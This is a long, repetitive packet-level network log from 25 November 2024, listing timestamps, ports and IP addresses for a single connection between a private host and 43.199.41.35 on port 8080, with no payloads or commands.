                                                                                                                                                        Nov 25, 2024 11:10:18.486390114 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:18.486759901 CET497058080192.168.2.543.199.41.35
                                                                                                                                                        Nov 25, 2024 11:10:18.486769915 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:18.486840963 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:18.486890078 CET497058080192.168.2.543.199.41.35
                                                                                                                                                        Nov 25, 2024 11:10:18.487617970 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:18.487679005 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:18.487732887 CET497058080192.168.2.543.199.41.35
                                                                                                                                                        Nov 25, 2024 11:10:18.488477945 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:18.488590002 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:18.488651037 CET497058080192.168.2.543.199.41.35
                                                                                                                                                        Nov 25, 2024 11:10:18.489468098 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:18.489523888 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:18.489579916 CET497058080192.168.2.543.199.41.35
                                                                                                                                                        Nov 25, 2024 11:10:18.490293026 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:18.491055965 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:18.491106987 CET497058080192.168.2.543.199.41.35
                                                                                                                                                        Nov 25, 2024 11:10:18.492779016 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:18.492790937 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:18.492840052 CET497058080192.168.2.543.199.41.35
                                                                                                                                                        Nov 25, 2024 11:10:18.514745951 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:18.514830112 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:18.514905930 CET497058080192.168.2.543.199.41.35
                                                                                                                                                        Nov 25, 2024 11:10:18.515027046 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:18.515088081 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:18.515127897 CET497058080192.168.2.543.199.41.35
                                                                                                                                                        Nov 25, 2024 11:10:18.515938044 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:18.516036987 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:18.516093016 CET497058080192.168.2.543.199.41.35
                                                                                                                                                        Nov 25, 2024 11:10:18.516791105 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:18.516988039 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:18.517035007 CET497058080192.168.2.543.199.41.35
                                                                                                                                                        Nov 25, 2024 11:10:18.517698050 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:18.517785072 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:18.517839909 CET497058080192.168.2.543.199.41.35
                                                                                                                                                        Nov 25, 2024 11:10:18.518594027 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:18.518703938 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:18.518753052 CET497058080192.168.2.543.199.41.35
                                                                                                                                                        Nov 25, 2024 11:10:18.519474030 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:18.519575119 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:18.519628048 CET497058080192.168.2.543.199.41.35
                                                                                                                                                        Nov 25, 2024 11:10:18.520359039 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:18.520478010 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:18.520529985 CET497058080192.168.2.543.199.41.35
                                                                                                                                                        Nov 25, 2024 11:10:18.521245956 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:18.521296024 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:18.521347046 CET497058080192.168.2.543.199.41.35
                                                                                                                                                        Nov 25, 2024 11:10:18.522160053 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:18.522248983 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:18.522300005 CET497058080192.168.2.543.199.41.35
                                                                                                                                                        Nov 25, 2024 11:10:18.543982983 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:18.544142008 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:18.544215918 CET497058080192.168.2.543.199.41.35
                                                                                                                                                        Nov 25, 2024 11:10:18.544272900 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:18.544476986 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:18.544559002 CET497058080192.168.2.543.199.41.35
                                                                                                                                                        Nov 25, 2024 11:10:18.545094013 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:18.545263052 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:18.545315027 CET497058080192.168.2.543.199.41.35
                                                                                                                                                        Nov 25, 2024 11:10:18.546037912 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:18.546200037 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:18.546248913 CET497058080192.168.2.543.199.41.35
                                                                                                                                                        Nov 25, 2024 11:10:18.547177076 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:18.547189951 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:18.547241926 CET497058080192.168.2.543.199.41.35
                                                                                                                                                        Nov 25, 2024 11:10:18.547946930 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:18.548100948 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:18.548154116 CET497058080192.168.2.543.199.41.35
                                                                                                                                                        Nov 25, 2024 11:10:18.548916101 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:18.548928022 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:18.548969984 CET497058080192.168.2.543.199.41.35
                                                                                                                                                        Nov 25, 2024 11:10:18.549742937 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:18.549756050 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:18.549796104 CET497058080192.168.2.543.199.41.35
                                                                                                                                                        Nov 25, 2024 11:10:18.550576925 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:18.550774097 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:18.550825119 CET497058080192.168.2.543.199.41.35
                                                                                                                                                        Nov 25, 2024 11:10:18.551306009 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:18.551491022 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:18.551547050 CET497058080192.168.2.543.199.41.35
                                                                                                                                                        Nov 25, 2024 11:10:18.552493095 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:18.552505016 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:18.552556992 CET497058080192.168.2.543.199.41.35
                                                                                                                                                        Nov 25, 2024 11:10:18.553267956 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:18.553284883 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:18.553339005 CET497058080192.168.2.543.199.41.35
                                                                                                                                                        Nov 25, 2024 11:10:18.554076910 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:18.554235935 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:18.554286957 CET497058080192.168.2.543.199.41.35
                                                                                                                                                        Nov 25, 2024 11:10:18.554977894 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:18.554991007 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:18.555032969 CET497058080192.168.2.543.199.41.35
                                                                                                                                                        Nov 25, 2024 11:10:18.555751085 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:18.555928946 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:18.555979967 CET497058080192.168.2.543.199.41.35
                                                                                                                                                        Nov 25, 2024 11:10:18.556840897 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:18.556853056 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:18.556905985 CET497058080192.168.2.543.199.41.35
                                                                                                                                                        Nov 25, 2024 11:10:18.557528019 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:18.557704926 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:18.557754993 CET497058080192.168.2.543.199.41.35
                                                                                                                                                        Nov 25, 2024 11:10:18.558567047 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:18.558737040 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:18.558788061 CET497058080192.168.2.543.199.41.35
                                                                                                                                                        Nov 25, 2024 11:10:18.559376955 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:18.559835911 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:18.559885979 CET497058080192.168.2.543.199.41.35
                                                                                                                                                        Nov 25, 2024 11:10:18.560373068 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:18.560544014 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:18.560589075 CET497058080192.168.2.543.199.41.35
                                                                                                                                                        Nov 25, 2024 11:10:18.561384916 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:18.561398983 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:18.561443090 CET497058080192.168.2.543.199.41.35
                                                                                                                                                        Nov 25, 2024 11:10:18.562206984 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:18.562220097 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:18.562284946 CET497058080192.168.2.543.199.41.35
                                                                                                                                                        Nov 25, 2024 11:10:18.562946081 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:18.563113928 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:18.563163042 CET497058080192.168.2.543.199.41.35
                                                                                                                                                        Nov 25, 2024 11:10:18.563898087 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:18.564054966 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:18.564101934 CET497058080192.168.2.543.199.41.35
                                                                                                                                                        Nov 25, 2024 11:10:18.565027952 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:18.565040112 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:18.565080881 CET497058080192.168.2.543.199.41.35
                                                                                                                                                        Nov 25, 2024 11:10:18.565763950 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:18.565778971 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:18.565831900 CET497058080192.168.2.543.199.41.35
                                                                                                                                                        Nov 25, 2024 11:10:18.566519022 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:18.566668987 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:18.566715956 CET497058080192.168.2.543.199.41.35
                                                                                                                                                        Nov 25, 2024 11:10:18.567473888 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:18.567490101 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:18.567534924 CET497058080192.168.2.543.199.41.35
                                                                                                                                                        Nov 25, 2024 11:10:18.568396091 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:18.568412066 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:18.568447113 CET497058080192.168.2.543.199.41.35
                                                                                                                                                        Nov 25, 2024 11:10:18.569240093 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:18.569252968 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:18.569293976 CET497058080192.168.2.543.199.41.35
                                                                                                                                                        Nov 25, 2024 11:10:18.570051908 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:18.570066929 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:18.570120096 CET497058080192.168.2.543.199.41.35
                                                                                                                                                        Nov 25, 2024 11:10:18.570957899 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:18.570976973 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:18.571014881 CET497058080192.168.2.543.199.41.35
                                                                                                                                                        Nov 25, 2024 11:10:18.571711063 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:18.572021008 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:18.572061062 CET497058080192.168.2.543.199.41.35
                                                                                                                                                        Nov 25, 2024 11:10:18.572663069 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:18.572832108 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:18.572849035 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:18.572880983 CET497058080192.168.2.543.199.41.35
                                                                                                                                                        Nov 25, 2024 11:10:18.573795080 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:18.573865891 CET497058080192.168.2.543.199.41.35
                                                                                                                                                        Nov 25, 2024 11:10:18.574517012 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:18.574683905 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:18.574736118 CET497058080192.168.2.543.199.41.35
                                                                                                                                                        Nov 25, 2024 11:10:18.575305939 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:18.620292902 CET497058080192.168.2.543.199.41.35
                                                                                                                                                        Nov 25, 2024 11:10:18.678412914 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:18.678450108 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:18.678527117 CET497058080192.168.2.543.199.41.35
                                                                                                                                                        Nov 25, 2024 11:10:18.678774118 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:18.678965092 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:18.679009914 CET497058080192.168.2.543.199.41.35
                                                                                                                                                        Nov 25, 2024 11:10:18.679660082 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:18.679778099 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:18.679826975 CET497058080192.168.2.543.199.41.35
                                                                                                                                                        Nov 25, 2024 11:10:18.680565119 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:18.680654049 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:18.680705070 CET497058080192.168.2.543.199.41.35
                                                                                                                                                        Nov 25, 2024 11:10:18.681436062 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:18.681549072 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:18.681600094 CET497058080192.168.2.543.199.41.35
                                                                                                                                                        Nov 25, 2024 11:10:18.682331085 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:18.682416916 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:18.682466030 CET497058080192.168.2.543.199.41.35
                                                                                                                                                        Nov 25, 2024 11:10:18.683253050 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:18.683295965 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:18.683347940 CET497058080192.168.2.543.199.41.35
                                                                                                                                                        Nov 25, 2024 11:10:18.706828117 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:18.706903934 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:18.706967115 CET497058080192.168.2.543.199.41.35
                                                                                                                                                        Nov 25, 2024 11:10:18.707209110 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:18.707351923 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:18.707403898 CET497058080192.168.2.543.199.41.35
                                                                                                                                                        Nov 25, 2024 11:10:18.708120108 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:18.708252907 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:18.708307028 CET497058080192.168.2.543.199.41.35
                                                                                                                                                        Nov 25, 2024 11:10:18.709017038 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:18.709104061 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:18.709155083 CET497058080192.168.2.543.199.41.35
                                                                                                                                                        Nov 25, 2024 11:10:18.709861994 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:18.710016012 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:18.710063934 CET497058080192.168.2.543.199.41.35
                                                                                                                                                        Nov 25, 2024 11:10:18.710788012 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:18.710889101 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:18.710942030 CET497058080192.168.2.543.199.41.35
                                                                                                                                                        Nov 25, 2024 11:10:18.711874962 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:18.711955070 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:18.712002039 CET497058080192.168.2.543.199.41.35
                                                                                                                                                        Nov 25, 2024 11:10:18.712709904 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:18.712850094 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:18.712914944 CET497058080192.168.2.543.199.41.35
                                                                                                                                                        Nov 25, 2024 11:10:18.713690042 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:18.713737965 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:18.713788033 CET497058080192.168.2.543.199.41.35
                                                                                                                                                        Nov 25, 2024 11:10:18.714538097 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:18.714652061 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:18.714695930 CET497058080192.168.2.543.199.41.35
                                                                                                                                                        Nov 25, 2024 11:10:18.734399080 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:18.734534025 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:18.734643936 CET497058080192.168.2.543.199.41.35
                                                                                                                                                        Nov 25, 2024 11:10:18.734793901 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:18.734941959 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:18.734991074 CET497058080192.168.2.543.199.41.35
                                                                                                                                                        Nov 25, 2024 11:10:18.735672951 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:18.735768080 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:18.735815048 CET497058080192.168.2.543.199.41.35
                                                                                                                                                        Nov 25, 2024 11:10:18.736649990 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:18.736716986 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:18.736762047 CET497058080192.168.2.543.199.41.35
                                                                                                                                                        Nov 25, 2024 11:10:18.737462997 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:18.737586021 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:18.737636089 CET497058080192.168.2.543.199.41.35
                                                                                                                                                        Nov 25, 2024 11:10:18.738348007 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:18.738455057 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:18.738502979 CET497058080192.168.2.543.199.41.35
                                                                                                                                                        Nov 25, 2024 11:10:18.739520073 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:18.739685059 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:18.739732981 CET497058080192.168.2.543.199.41.35
                                                                                                                                                        Nov 25, 2024 11:10:18.740128040 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:18.740231991 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:18.740278959 CET497058080192.168.2.543.199.41.35
                                                                                                                                                        Nov 25, 2024 11:10:18.740991116 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:18.741120100 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:18.741170883 CET497058080192.168.2.543.199.41.35
                                                                                                                                                        Nov 25, 2024 11:10:18.741885900 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:18.742022038 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:18.742074013 CET497058080192.168.2.543.199.41.35
                                                                                                                                                        Nov 25, 2024 11:10:18.742789984 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:18.742935896 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:18.742985964 CET497058080192.168.2.543.199.41.35
                                                                                                                                                        Nov 25, 2024 11:10:18.743680000 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:18.743887901 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:18.743937969 CET497058080192.168.2.543.199.41.35
                                                                                                                                                        Nov 25, 2024 11:10:18.744543076 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:18.744649887 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:18.744712114 CET497058080192.168.2.543.199.41.35
                                                                                                                                                        Nov 25, 2024 11:10:18.745428085 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:18.745647907 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:18.745703936 CET497058080192.168.2.543.199.41.35
                                                                                                                                                        Nov 25, 2024 11:10:18.746320009 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:18.746433020 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:18.746481895 CET497058080192.168.2.543.199.41.35
                                                                                                                                                        Nov 25, 2024 11:10:18.747193098 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:18.747379065 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:18.747436047 CET497058080192.168.2.543.199.41.35
                                                                                                                                                        Nov 25, 2024 11:10:18.748079062 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:18.748193026 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:18.748244047 CET497058080192.168.2.543.199.41.35
                                                                                                                                                        Nov 25, 2024 11:10:18.748971939 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:18.749104023 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:18.749159098 CET497058080192.168.2.543.199.41.35
                                                                                                                                                        Nov 25, 2024 11:10:18.749855995 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:18.749974012 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:18.750025988 CET497058080192.168.2.543.199.41.35
                                                                                                                                                        Nov 25, 2024 11:10:18.750782013 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:18.750853062 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:18.750906944 CET497058080192.168.2.543.199.41.35
                                                                                                                                                        Nov 25, 2024 11:10:18.751646042 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:18.751737118 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:18.751784086 CET497058080192.168.2.543.199.41.35
                                                                                                                                                        Nov 25, 2024 11:10:18.752542973 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:18.752655029 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:18.752705097 CET497058080192.168.2.543.199.41.35
                                                                                                                                                        Nov 25, 2024 11:10:18.753412962 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:18.753546000 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:18.753598928 CET497058080192.168.2.543.199.41.35
                                                                                                                                                        Nov 25, 2024 11:10:18.754287958 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:18.754497051 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:18.754549026 CET497058080192.168.2.543.199.41.35
                                                                                                                                                        Nov 25, 2024 11:10:18.755259037 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:18.755341053 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:18.755394936 CET497058080192.168.2.543.199.41.35
                                                                                                                                                        Nov 25, 2024 11:10:18.756063938 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:18.756176949 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:18.756230116 CET497058080192.168.2.543.199.41.35
                                                                                                                                                        Nov 25, 2024 11:10:18.756956100 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:18.757107019 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:18.757158041 CET497058080192.168.2.543.199.41.35
                                                                                                                                                        Nov 25, 2024 11:10:18.757833958 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:18.757992029 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:18.758066893 CET497058080192.168.2.543.199.41.35
                                                                                                                                                        Nov 25, 2024 11:10:18.758718967 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:18.758791924 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:18.758843899 CET497058080192.168.2.543.199.41.35
                                                                                                                                                        Nov 25, 2024 11:10:18.759659052 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:18.759701967 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:18.759752035 CET497058080192.168.2.543.199.41.35
                                                                                                                                                        Nov 25, 2024 11:10:18.760497093 CET80804970543.199.41.35192.168.2.5
